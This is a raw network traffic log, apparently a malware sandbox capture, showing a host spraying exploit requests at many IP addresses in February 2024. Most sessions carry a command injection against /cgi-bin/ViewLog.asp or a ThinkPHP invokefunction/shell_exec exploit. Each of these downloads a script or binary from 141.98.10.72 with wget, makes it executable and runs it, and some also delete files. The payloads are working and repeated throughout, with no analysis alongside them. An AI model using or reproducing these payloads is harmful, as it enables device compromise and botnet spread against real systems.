ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
703	192.168.2.15	53678	62.29.72.138	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.094440937 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
704	192.168.2.15	47296	94.120.159.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.096225023 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
705	192.168.2.15	47460	94.120.54.251	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.097987890 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
706	192.168.2.15	51452	94.122.77.192	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.098160028 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
707	192.168.2.15	37484	94.123.118.218	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.098299026 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
708	192.168.2.15	43708	62.94.231.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.099536896 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
709	192.168.2.15	51716	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.442542076 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:01Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
710	192.168.2.15	52446	62.29.115.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.590029001 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
711	192.168.2.15	51740	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:31.144556999 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:02Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
712	192.168.2.15	36206	88.99.168.212	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:31.339859962 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:31.547741890 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:31 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
713	192.168.2.15	44240	88.198.38.79	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:31.340101004 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:31.549338102 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:31 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
714	192.168.2.15	57328	95.101.253.210	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:31.536429882 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:31.733071089 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:31 GMT Date: Wed, 14 Feb 2024 08:30:31 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 36 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 33 31 26 23 34 36 3b 33 30 38 65 34 65 64 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.863f655f.1707899431.308e4ede</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
715	192.168.2.15	56082	95.100.75.213	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:31.540514946 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:31.741523981 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:31 GMT Date: Wed, 14 Feb 2024 08:30:31 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 61 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 34 33 31 26 23 34 36 3b 34 63 39 66 64 38 37 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.aa7a7b5c.1707899431.4c9fd870</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
716	192.168.2.15	49146	95.100.100.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:31.545066118 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:31.750567913 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:31 GMT Date: Wed, 14 Feb 2024 08:30:31 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 36 36 34 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 33 31 26 23 34 36 3b 33 34 34 33 35 32 32 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4664645f.1707899431.34435223</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
717	192.168.2.15	51748	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:31.854316950 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:02Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
718	192.168.2.15	38228	94.178.243.74	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:32.597855091 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.873173952 CET	21	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
719	192.168.2.15	55808	94.120.105.112	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:32.600430965 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
720	192.168.2.15	57758	95.86.118.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:32.602845907 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
721	192.168.2.15	37824	31.145.136.57	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:32.612750053 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
722	192.168.2.15	43216	95.169.93.91	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:32.820368052 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.049107075 CET	435	IN	HTTP/1.1 406 Not Acceptable Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'none' Content-Length: 116 X-Frame-Options: SAMEORIGIN Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 36 20 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 36 20 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>406 Not Acceptable</title></head><body><center><h1>406 Not Acceptable</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
723	192.168.2.15	53560	62.29.72.10	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:32.846084118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
724	192.168.2.15	34690	94.123.248.118	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:32.847465992 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
725	192.168.2.15	33868	95.86.118.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:32.851593018 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
726	192.168.2.15	38744	95.86.105.4	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:32.851880074 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
727	192.168.2.15	35168	85.222.64.90	8080

Timestamp	Bytes transferred	Direction	Data
